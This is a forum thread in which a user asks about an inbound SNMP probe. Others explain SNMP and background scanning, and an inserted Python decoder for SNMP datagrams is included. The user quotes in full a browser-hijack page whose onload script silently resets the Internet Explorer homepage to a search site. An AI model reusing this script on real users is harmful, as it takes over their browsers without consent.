SNMP.exe

Status
Not open for further replies.

Spike

Could someone please tell me what the Simple Network Management Protocol is all about, how it can be used, and in particular, why a remote machine carrying the IP 65.70.150.187 would be originating a request to my machine?

I'll happily admit that I don't know anything about this protocol, but I've rarely seen it and I've just visited an interesting page at new.net that looked like it was scripted to attempt to change my homepage and serve me advertisements. Clearly, I'm wondering if the two might be related.
 
It's a protocol that allows you to ask for data from a device and also send data to a device. In plain terms, you can control things with it.

It is normally used to monitor and control networking gear like routers and switches.
Of course it can be used to transmit any data and perform any actions if the server supports it (by design or not).

You were most likely hit by a generic scan over a range of IP addresses looking for open SNMP ports and potentially vulnerable servers behind it.

If the access was blocked then don't sweat about it. You should be looking at traffic that actually gets through, not the normal internet background radiation.
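
What such a probe carries, as an added example that is not part of the original thread: a minimal decoder for an inbound SNMPv1/v2c datagram taken from a packet capture, showing the community string and the OIDs the sender asked for. The sample packet is constructed (a v1 GetRequest for sysDescr.0 with community "public"), and the function names are illustrative.

```python
# Constructed sample: SNMPv1 GetRequest, community "public", OID sysDescr.0
SAMPLE = bytes.fromhex("302602010004067075626c6963a019020101020100020100"
                       "300e300c06082b060102010101000500")
PDU_TYPES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "Response",
             0xA3: "SetRequest", 0xA5: "GetBulkRequest"}

def read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the BER element starting at pos."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported length encoding")
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("element runs past end of datagram")
    return tag, buf[pos:pos + length], pos + length

def decode_oid(raw):
    """BER OID bytes -> dotted string (first byte packs the first two arcs)."""
    if not raw:
        raise ValueError("empty OID")
    first = min(raw[0] // 40, 2)
    arcs, sub = [first, raw[0] - 40 * first], 0
    for b in raw[1:]:
        sub = (sub << 7) | (b & 0x7F)
        if not b & 0x80:  # high bit clear marks the last byte of an arc
            arcs.append(sub)
            sub = 0
    return ".".join(map(str, arcs))

def summarize_snmp(datagram):
    tag, msg, _ = read_tlv(datagram, 0)          # outer SEQUENCE
    vtag, version, pos = read_tlv(msg, 0)        # INTEGER version
    ctag, community, pos = read_tlv(msg, pos)    # OCTET STRING community
    pdu_tag, pdu, _ = read_tlv(msg, pos)
    if (tag, vtag, ctag) != (0x30, 0x02, 0x04) or pdu_tag not in PDU_TYPES:
        raise ValueError("not an SNMPv1/v2c request or response")
    p = 0
    for _ in range(4):  # request-id, error-status, error-index, then varbind list
        _, varbinds, p = read_tlv(pdu, p)
    oids, p = [], 0
    while p < len(varbinds):
        _, varbind, p = read_tlv(varbinds, p)
        oids.append(decode_oid(read_tlv(varbind, 0)[1]))
    return {"version": {0: "v1", 1: "v2c"}.get(int.from_bytes(version, "big"), "?"),
            "community": community.decode("ascii", "replace"),
            "pdu": PDU_TYPES[pdu_tag], "oids": oids}
```

Calling `summarize_snmp(SAMPLE)` returns the version, community string, request type and requested OIDs; truncated or non-SNMP input raises `ValueError` instead of being misread.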
 
Many thanks for that, Nodsu! Very helpful.

I do tend to look at the traffic that gets through, but as this was the first time my firewall had encountered a request for the service, it struck me as strange, and so I blocked the traffic.

What I did wonder, was that perhaps it was possible that my computer had picked up something from a new.net site that offered me a page called shp.php containing

<HTML XMLNS:IE>
<HEAD>
<STYLE>
@media all { IE\:HOMEPAGE { behavior:url(#default#homepage)}}
</STYLE>

<SCRIPT>
var HP="http://search.qsrch.com/";
function setHP(){
if(!oHomePage.isHomePage(HP)){ oHomePage.setHomePage(HP); }
window.close('SHP');
}
</SCRIPT>
</HEAD>
<BODY onload="setHP()">
<IE:HOMEPAGE ID="oHomePage" />
</BODY>
</HTML>
amongst a variety of other ads and pages.

I thought that perhaps the SNMP request may have been initiated by something my machine may have downloaded when it decided to visit these pages. I don't get this sort of thing often these days.

The only reason these things particularly bother me is that I've found that quite often, the damage from hijacks or spyware isn't too great a problem until you reboot the machine, and so catching it quickly can save a lot of hassle. I may be wrong about this, but it's what my experience so far seems to indicate.

Many thanks.
 
Obviously some rotter who wants to change your home-page. Put him and its IP on the blacklist if you can, in Windows put them in your HOSTS file.
 